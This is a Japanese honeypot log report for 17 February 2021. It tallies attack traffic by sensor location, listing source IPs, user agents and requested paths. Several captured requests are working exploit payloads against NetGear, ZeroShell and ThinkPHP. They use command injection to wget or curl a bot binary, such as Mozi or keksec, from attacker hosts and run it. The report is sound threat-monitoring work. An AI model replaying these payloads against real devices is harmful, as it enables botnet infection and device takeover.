2021/02/17 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/02/17分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為

Location：JP

FCKEditorの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Anarchy99によるスキャン行為
Apache Tomcatへのスキャン行為
を確認しました。

Location：US

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Anarchy99によるスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//120[.]209[.]126[.]240:41650/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//42[.]225[.]53[.]150:35883/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：UK

ZeroShell Linux Routerの脆弱性(CVE-2020-29390)を狙うアクセス
Apache Tomcatへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：SG

ZeroShell Linux Routerの脆弱性(CVE-2020-29390)を狙うアクセス
Anarchy99によるスキャン行為
bitdiscoveryによるスキャン行為
Apache Tomcatへのスキャン行為
/[a-z0-9]\.(gz|tar|tar.bz2|txt|zip)に対してのスキャン
5[.]188[.]210[.]227に関する不正通信
を確認しました。

他

アクセス数推移

JP：総アクセス数：76 (前日比：+24)
US：総アクセス数：147 (前日比：-10)
UK：総アクセス数：74 (前日比：+29)
SG：総アクセス数：347 (前日比：+297)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	18.222.57.19	United States
2	20.52.135.168	United States
2	20.195.56.109	United States
2	20.198.209.0	United States
1	37.49.229.191	Belize
2	40.117.155.43	United States
1	40.122.76.169	United States
1	40.124.48.39	United States
13	45.87.214.107	Romania
11	45.155.205.108	Russia
2	51.15.250.63	France
1	51.159.165.209	France
1	52.175.211.69	United States
1	68.183.25.193	United States
3	85.132.3.30	Azerbaijan
1	89.187.163.246	Czechia
1	101.0.34.43	India
1	103.89.90.183	Vietnam
4	116.66.197.119	Nepal
4	121.5.76.205	China
1	128.14.133.58	United States
1	138.197.212.116	United States
1	157.245.242.214	United States
3	163.172.168.251	United Kingdom
1	172.104.242.173	United States
2	176.142.179.251	France
1	192.241.217.179	United States
1	192.241.220.48	United States
1	192.241.224.105	United States
1	193.118.53.210	United States
2	194.127.179.44	United Kingdom
1	195.154.63.222	France
1	206.189.94.151	United States
1	209.141.60.60	United States
1	212.83.8.80	Russia
1	213.202.233.63	Germany
1	213.238.182.236	Turkey

UserAgent一覧

件数	UserAgent
12	-
1	Anarchy99
4	Go-http-client/1.1
4	Mozilla 5/0
3	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4; rv:52.7.1) Gecko/20100101 Firefox/52.7.1
1	Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
9	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
13	Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3	Mozilla/5.0 zgrab/0.x
1	User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
2		\x16\x03\x01
1	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
14	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/admin/includes/general.js	HTTP/1.1
1	GET	/admin/view/javascript/common.js	HTTP/1.1
1	GET	/administrator/	HTTP/1.1
1	GET	/administrator/help/en-GB/toc.json	HTTP/1.1
1	GET	/administrator/language/en-GB/install.xml	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
3	GET	/favicon.ico	HTTP/1.1
1	GET	/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media	HTTP/1.1
1	GET	/home.php	HTTP/1.1
1	GET	/images/editor/separator.gif	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
3	GET	/jenkins/login	HTTP/1.0
1	GET	/js/header-rollup-554.js	HTTP/1.1
3	GET	/login	HTTP/1.0
4	GET	/manager/html	HTTP/1.1
1	GET	/misc/ajax.js	HTTP/1.1
1	GET	/owa	HTTP/1.1
1	GET	/plugins/system/debug/debug.xml	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//101[.]0[.]34[.]43:55056/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/solr/	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/build.xml	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/phpunit.xml	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/webfig/	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-includes/js/jquery/jquery.js	HTTP/1.1
3	GET	/wp-login.php	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
4	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//seduced[.]xyz/770ff81ae4d4371f9639f4dfd4115a27d776f16dc93e0606fcf925b29811ae76419ad761d9d9931866ebedec5fa68459e7ee72b1089059dc7e6977e6a0111c3c31f3c001bd16c305f701b3b13a0b4081d2effc4609b356eb0451e6a8ae316763	HTTP/1.1
1		\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	13.90.140.186	United States
2	35.230.153.112	United States
1	37.49.229.191	Belize
1	42.225.53.150	China
1	45.56.100.192	United States
1	45.79.127.61	United States
11	45.155.205.108	Russia
101	84.169.178.12	Germany
2	86.95.200.190	Netherlands
1	88.202.231.177	United Kingdom
1	91.241.19.21	Russia
1	103.89.90.183	Vietnam
1	103.217.121.217	India
1	115.238.65.122	China
1	120.209.126.240	China
4	121.5.76.205	China
1	125.41.11.133	China
1	171.214.11.139	China
1	172.104.242.173	United States
1	172.105.89.161	United States
1	192.241.195.53	United States
1	192.241.210.236	United States
1	192.241.222.33	United States
1	192.241.225.74	United States
1	193.118.53.202	United States
2	194.127.179.44	United Kingdom
1	206.189.94.151	United States
2	209.141.60.60	United States
1	213.202.233.63	Germany
1	220.81.142.161	South Korea

UserAgent一覧

件数	UserAgent
9	-
1	Anarchy99
1	Go-http-client/1.1
2	Hello, World
2	Hello, world
2	Mozilla 5/0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
101	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
1	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
5	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4	Mozilla/5.0 zgrab/0.x
1	python-requests/2.25.1

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x03
1		\x16\x03\x01
8	GET	/.env	HTTP/1.1
1	GET	/0bef	HTTP/1.0
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.0
1	GET	/login	HTTP/1.0
1	GET	/manager/html	HTTP/1.1
101	GET	/phpmyadmin/	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/server-status	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]41[.]11[.]133:53192/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//120[.]209[.]126[.]240:41650/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//42[.]225[.]53[.]150:35883/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/phpunit.xml	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/webfig/	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1		\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	5.180.211.73	United Kingdom
1	5.180.211.107	United Kingdom
1	5.188.210.227	Russia
4	13.49.46.100	United States
3	20.64.120.152	United States
2	34.95.0.215	United States
1	36.32.3.91	China
1	37.49.229.191	Belize
4	40.113.153.216	United States
11	45.155.205.108	Russia
1	49.89.216.63	China
14	84.110.106.22	Israel
3	92.63.197.12	Russia
1	110.83.32.100	China
1	113.128.105.6	China
1	113.206.177.76	China
1	119.29.61.53	China
1	121.57.227.222	China
2	124.74.40.6	China
1	124.227.31.127	China
1	128.14.134.170	United States
2	129.213.20.146	United States
1	150.255.1.103	China
1	172.105.77.209	United States
1	172.105.248.50	United States
1	175.184.166.186	China
1	178.62.205.233	United States
1	180.95.231.204	China
1	192.241.206.208	United States
1	192.241.215.172	United States
1	192.241.216.65	United States
1	193.118.53.202	United States
2	209.141.60.60	United States
1	213.202.233.63	Germany
1	219.140.119.245	China
1	221.213.75.245	China

UserAgent一覧

件数	UserAgent
26	-
2	Go-http-client/1.1
1	Hello, World
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
6	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
4	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
3	Mozilla/5.0 zgrab/0.x
1	Mozilla/5.01688858 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
4	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
3	python-requests/2.25.1

リクエスト内容一覧

件数	Method	Request	Protocol
4		-
1		\x03
1		\x16\x03\x01
1	CONNECT	cn[.]bing[.]com/:443	HTTP/1.1
2	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
1	CONNECT	www[.]so[.]com/:443	HTTP/1.1
1	CONNECT	www[.]voanews[.]com/:443	HTTP/1.1
4	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
14	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22	HTTP/1.0
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/jenkins/login	HTTP/1.0
2	GET	/login	HTTP/1.0
2	GET	/manager/html	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
3	GET	/public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=curl%205.180.211.73/thinkphp	HTTP/1.1
1	GET	/solr/	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/webfig/	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
2	GET	/wp-login.php	HTTP/1.1
1	GET	http[:]//5[.]188[.]210[.]227/echo.php	HTTP/1.1
1	GET	http[:]//azenv[.]net/	HTTP/1.1
1	GET	http[:]//dongtaiwang[.]com/	HTTP/1.1
1	GET	http[:]//www[.]epochtimes[.]com/	HTTP/1.1
1	GET	http[:]//www[.]minghui[.]org/	HTTP/1.1
1	GET	http[:]//www[.]rfa[.]org/english/	HTTP/1.1
1	GET	http[:]//www[.]soso[.]com/	HTTP/1.1
1	GET	http[:]//www[.]wujieliulan[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	HEAD	http[:]//110[.]242[.]68[.]4/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
181	5.8.10.202	Russia
1	5.188.210.227	Russia
1	18.234.46.6	United States
2	35.186.161.212	United States
1	37.49.229.191	Belize
11	45.155.205.108	Russia
1	51.159.165.209	France
4	85.26.92.232	Belgium
1	91.246.67.176	Poland
4	104.45.6.194	United States
2	119.29.242.180	China
101	123.54.198.41	China
1	128.14.133.58	United States
4	162.250.190.146	Canada
10	182.254.146.173	China
3	185.156.73.65	Russia
1	192.241.210.202	United States
1	192.241.224.181	United States
10	193.112.94.225	China
1	193.118.53.210	United States
1	206.189.94.151	United States
1	209.126.151.119	United States
2	209.141.60.60	United States
1	213.202.233.63	Germany
1	213.238.182.236	Turkey

UserAgent一覧

件数	UserAgent
9	-
1	Anarchy99
4	Go-http-client/1.1
181	Mozilla/5.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
101	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
18	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
9	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	Mozilla/5.0 zgrab/0.x
1	bitdiscovery
2	python-requests/2.3.0 CPython/2.7.18 Windows/10

リクエスト内容一覧

件数	Method	Request	Protocol
3		-
1		\x03
1		\x16\x03\x01
4	GET	/.env	HTTP/1.1
1	GET	/0.gz	HTTP/1.1
1	GET	/0.tar	HTTP/1.1
1	GET	/0.tar.bz2	HTTP/1.1
1	GET	/0.txt	HTTP/1.1
1	GET	/0.zip	HTTP/1.1
1	GET	/1.gz	HTTP/1.1
1	GET	/1.tar	HTTP/1.1
1	GET	/1.tar.bz2	HTTP/1.1
1	GET	/1.txt	HTTP/1.1
1	GET	/1.zip	HTTP/1.1
1	GET	/2.gz	HTTP/1.1
1	GET	/2.tar	HTTP/1.1
1	GET	/2.tar.bz2	HTTP/1.1
1	GET	/2.txt	HTTP/1.1
1	GET	/2.zip	HTTP/1.1
1	GET	/3.gz	HTTP/1.1
1	GET	/3.tar	HTTP/1.1
1	GET	/3.tar.bz2	HTTP/1.1
1	GET	/3.txt	HTTP/1.1
1	GET	/3.zip	HTTP/1.1
1	GET	/4.gz	HTTP/1.1
1	GET	/4.tar	HTTP/1.1
1	GET	/4.tar.bz2	HTTP/1.1
1	GET	/4.txt	HTTP/1.1
1	GET	/4.zip	HTTP/1.1
1	GET	/5.gz	HTTP/1.1
1	GET	/5.tar	HTTP/1.1
1	GET	/5.tar.bz2	HTTP/1.1
1	GET	/5.txt	HTTP/1.1
1	GET	/5.zip	HTTP/1.1
1	GET	/6.gz	HTTP/1.1
1	GET	/6.tar	HTTP/1.1
1	GET	/6.tar.bz2	HTTP/1.1
1	GET	/6.txt	HTTP/1.1
1	GET	/6.zip	HTTP/1.1
1	GET	/7.gz	HTTP/1.1
1	GET	/7.tar	HTTP/1.1
1	GET	/7.tar.bz2	HTTP/1.1
1	GET	/7.txt	HTTP/1.1
1	GET	/7.zip	HTTP/1.1
1	GET	/8.gz	HTTP/1.1
1	GET	/8.tar	HTTP/1.1
1	GET	/8.tar.bz2	HTTP/1.1
1	GET	/8.txt	HTTP/1.1
1	GET	/8.zip	HTTP/1.1
1	GET	/9.gz	HTTP/1.1
1	GET	/9.tar	HTTP/1.1
1	GET	/9.tar.bz2	HTTP/1.1
1	GET	/9.txt	HTTP/1.1
1	GET	/9.zip	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/a.gz	HTTP/1.1
1	GET	/a.tar	HTTP/1.1
1	GET	/a.tar.bz2	HTTP/1.1
1	GET	/a.txt	HTTP/1.1
1	GET	/a.zip	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
2	GET	/app/.env	HTTP/1.1
1	GET	/b.gz	HTTP/1.1
1	GET	/b.tar	HTTP/1.1
1	GET	/b.tar.bz2	HTTP/1.1
1	GET	/b.txt	HTTP/1.1
1	GET	/b.zip	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=user&psd=user	HTTP/1.0
1	GET	/c.gz	HTTP/1.1
1	GET	/c.tar	HTTP/1.1
1	GET	/c.tar.bz2	HTTP/1.1
1	GET	/c.txt	HTTP/1.1
1	GET	/c.zip	HTTP/1.1
2	GET	/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http[:]//198[.]144[.]190[.]5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http[:]//198[.]144[.]190[.]5/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a'	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
2	GET	/core/.env	HTTP/1.1
1	GET	/d.gz	HTTP/1.1
1	GET	/d.tar	HTTP/1.1
1	GET	/d.tar.bz2	HTTP/1.1
1	GET	/d.txt	HTTP/1.1
1	GET	/d.zip	HTTP/1.1
1	GET	/e.gz	HTTP/1.1
1	GET	/e.tar	HTTP/1.1
1	GET	/e.tar.bz2	HTTP/1.1
1	GET	/e.txt	HTTP/1.1
1	GET	/e.zip	HTTP/1.1
2	GET	/elrekt.php	HTTP/1.1
1	GET	/f.gz	HTTP/1.1
1	GET	/f.tar	HTTP/1.1
1	GET	/f.tar.bz2	HTTP/1.1
1	GET	/f.txt	HTTP/1.1
1	GET	/f.zip	HTTP/1.1
1	GET	/g.gz	HTTP/1.1
1	GET	/g.tar	HTTP/1.1
1	GET	/g.tar.bz2	HTTP/1.1
1	GET	/g.txt	HTTP/1.1
1	GET	/g.zip	HTTP/1.1
1	GET	/h.gz	HTTP/1.1
1	GET	/h.tar	HTTP/1.1
1	GET	/h.tar.bz2	HTTP/1.1
1	GET	/h.txt	HTTP/1.1
1	GET	/h.zip	HTTP/1.1
1	GET	/home.php	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
1	GET	/i.gz	HTTP/1.1
1	GET	/i.tar	HTTP/1.1
1	GET	/i.tar.bz2	HTTP/1.1
1	GET	/i.txt	HTTP/1.1
1	GET	/i.zip	HTTP/1.1
2	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
1	GET	/j.gz	HTTP/1.1
1	GET	/j.tar	HTTP/1.1
1	GET	/j.tar.bz2	HTTP/1.1
1	GET	/j.txt	HTTP/1.1
1	GET	/j.zip	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.0
1	GET	/k.gz	HTTP/1.1
1	GET	/k.tar	HTTP/1.1
1	GET	/k.tar.bz2	HTTP/1.1
1	GET	/k.txt	HTTP/1.1
1	GET	/k.zip	HTTP/1.1
1	GET	/l.gz	HTTP/1.1
1	GET	/l.tar	HTTP/1.1
1	GET	/l.tar.bz2	HTTP/1.1
1	GET	/l.txt	HTTP/1.1
1	GET	/l.zip	HTTP/1.1
1	GET	/login	HTTP/1.0
1	GET	/m.gz	HTTP/1.1
1	GET	/m.tar	HTTP/1.1
1	GET	/m.tar.bz2	HTTP/1.1
1	GET	/m.txt	HTTP/1.1
1	GET	/m.zip	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/n.gz	HTTP/1.1
1	GET	/n.tar	HTTP/1.1
1	GET	/n.tar.bz2	HTTP/1.1
1	GET	/n.txt	HTTP/1.1
1	GET	/n.zip	HTTP/1.1
1	GET	/o.gz	HTTP/1.1
1	GET	/o.tar	HTTP/1.1
1	GET	/o.tar.bz2	HTTP/1.1
1	GET	/o.txt	HTTP/1.1
1	GET	/o.zip	HTTP/1.1
1	GET	/p.gz	HTTP/1.1
1	GET	/p.tar	HTTP/1.1
1	GET	/p.tar.bz2	HTTP/1.1
1	GET	/p.txt	HTTP/1.1
1	GET	/p.zip	HTTP/1.1
101	GET	/phpmyadmin/	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
2	GET	/public/.env	HTTP/1.1
2	GET	/public/index.php	HTTP/1.1
1	GET	/q.gz	HTTP/1.1
1	GET	/q.tar	HTTP/1.1
1	GET	/q.tar.bz2	HTTP/1.1
1	GET	/q.txt	HTTP/1.1
1	GET	/q.zip	HTTP/1.1
1	GET	/r.gz	HTTP/1.1
1	GET	/r.tar	HTTP/1.1
1	GET	/r.tar.bz2	HTTP/1.1
1	GET	/r.txt	HTTP/1.1
1	GET	/r.zip	HTTP/1.1
1	GET	/s.gz	HTTP/1.1
1	GET	/s.tar	HTTP/1.1
1	GET	/s.tar.bz2	HTTP/1.1
1	GET	/s.txt	HTTP/1.1
1	GET	/s.zip	HTTP/1.1
1	GET	/solr/	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/t.gz	HTTP/1.1
1	GET	/t.tar	HTTP/1.1
1	GET	/t.tar.bz2	HTTP/1.1
1	GET	/t.txt	HTTP/1.1
1	GET	/t.zip	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/u.gz	HTTP/1.1
1	GET	/u.tar	HTTP/1.1
1	GET	/u.tar.bz2	HTTP/1.1
1	GET	/u.txt	HTTP/1.1
1	GET	/u.zip	HTTP/1.1
1	GET	/v.gz	HTTP/1.1
1	GET	/v.tar	HTTP/1.1
